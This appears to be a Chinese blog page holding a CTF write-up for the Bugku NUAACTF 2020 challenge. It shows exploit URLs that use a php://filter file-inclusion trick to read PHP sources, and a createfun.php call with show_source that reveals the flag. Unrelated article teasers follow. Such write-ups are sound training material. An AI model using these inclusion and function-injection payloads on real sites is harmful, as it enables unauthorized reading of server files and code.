news 2026/4/16 5:42:38

Bugku NUAACTF 2020 command-injection

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Bugku NUAACTF 2020 command-injection

前置知识

网络安全 文件包含漏洞-CSDN博客

解题过程

打开靶场、进行信息收集

在源码中发现include文件,直接访问,自动添加了URL参数file

/include.php?file=index

并且自动补齐了index参数,页面也跟初始页面相同,很明显是文件包含漏洞

直接尝试php伪协议读取下已知的源码,根据自动补齐的index参数,可以猜测后端是自动补齐.php,读取index.php:

/include.php?file=php://filter/read=convert.base64-encode/resource=index
<?php print <<<EOT <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <!--include.php--> <img src="img.jpg" alt="嘉木天下第一" /> </body> </html> EOT; ?>

读取include.php:

/include.php?file=php://filter/read=convert.base64-encode/resource=include
<?php error_reporting(0); @$file = $_GET["file"]; if(isset($file)) { if (preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) { echo "<p> error! </p>"; } else { include($file.'.php'); setcookie("tips","createfun.php"); } } else { header('Location:include.php?file=index'); } ?>

可以看到include.php过滤了敏感字符,我们无法直接读取flag

并且我们又看到另一个文件createfun.php,继续读取该文件:

/include.php?file=php://filter/read=convert.base64-encode/resource=createfun
<?php $func = @$_GET['func']; $arg = @$_GET['arg']; if(isset($func)&&isset($arg)){$func($arg,'');}

分析源码,获取两个参数,一个作为函数名,一个作为函数参数,然后会执行函数。

需要注意这个函数有两个参数,后面被自动设置为空,这里很多函数可以用,这里采用show_source,显示flag.php文件内容,这里flag.php可以通过前面include文件得出,也可以扫文件得到:

/createfun.php?func=show_source&arg=flag.php
<?php $flag="nuaactf{php_IS_thE_best_language}"; ?>

总结

一道基础的文件包含漏洞,包含了一些代码审计部分。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 11:01:36

Gitfiti终极指南:Git提交历史操纵技术深度解析

Gitfiti终极指南&#xff1a;Git提交历史操纵技术深度解析 【免费下载链接】gitfiti abusing github commit history for the lulz 项目地址: https://gitcode.com/gh_mirrors/gi/gitfiti GitHub贡献日历上的精美图案背后隐藏着怎样的技术秘密&#xff1f;本文将深度揭秘…

作者头像 李华
网站建设 2026/4/12 4:15:35

LocalAI终极部署手册:轻松搭建个人专属AI服务平台

想要在本地环境中运行强大的AI模型&#xff0c;却担心复杂的配置过程&#xff1f;LocalAI开源工具为您提供了完美的本地AI部署方案。这款功能丰富的平台让每个人都能轻松拥有专属的AI服务&#xff0c;完全摆脱对云端API的依赖。 【免费下载链接】LocalAI 项目地址: https://…

作者头像 李华
网站建设 2026/4/16 0:51:26

反查域名怎么操作?只要有IP,用这些方法一查一个准!

要是你遇上网站老是打不开、收到可疑网络攻击&#xff0c;或者要确认服务器真实身份的时候&#xff0c;IP地址一般就是唯一的线索。 借助IP反查域名可快速找到问题根源&#xff0c;比如说&#xff1a;企业能够排查异常服务器所关联的网站&#xff0c;个人用户能够找出钓鱼链接背…

作者头像 李华
网站建设 2026/4/6 16:09:51

OpenResume开源简历构建器:3分钟创建专业简历的完整指南

OpenResume开源简历构建器&#xff1a;3分钟创建专业简历的完整指南 【免费下载链接】open-resume OpenResume is a powerful open-source resume builder and resume parser. https://open-resume.com/ 项目地址: https://gitcode.com/gh_mirrors/op/open-resume 在竞争…

作者头像 李华
网站建设 2026/4/11 20:09:57

1.2B参数改写边缘智能规则:LFM2-Tool如何重塑终端计算范式

1.2B参数改写边缘智能规则&#xff1a;LFM2-Tool如何重塑终端计算范式 【免费下载链接】LFM2-1.2B-Tool 项目地址: https://ai.gitcode.com/hf_mirrors/LiquidAI/LFM2-1.2B-Tool 导语&#xff1a;无云依赖的智能终端革命已来 当智能手表仍在为3秒的响应延迟致歉时&…

作者头像 李华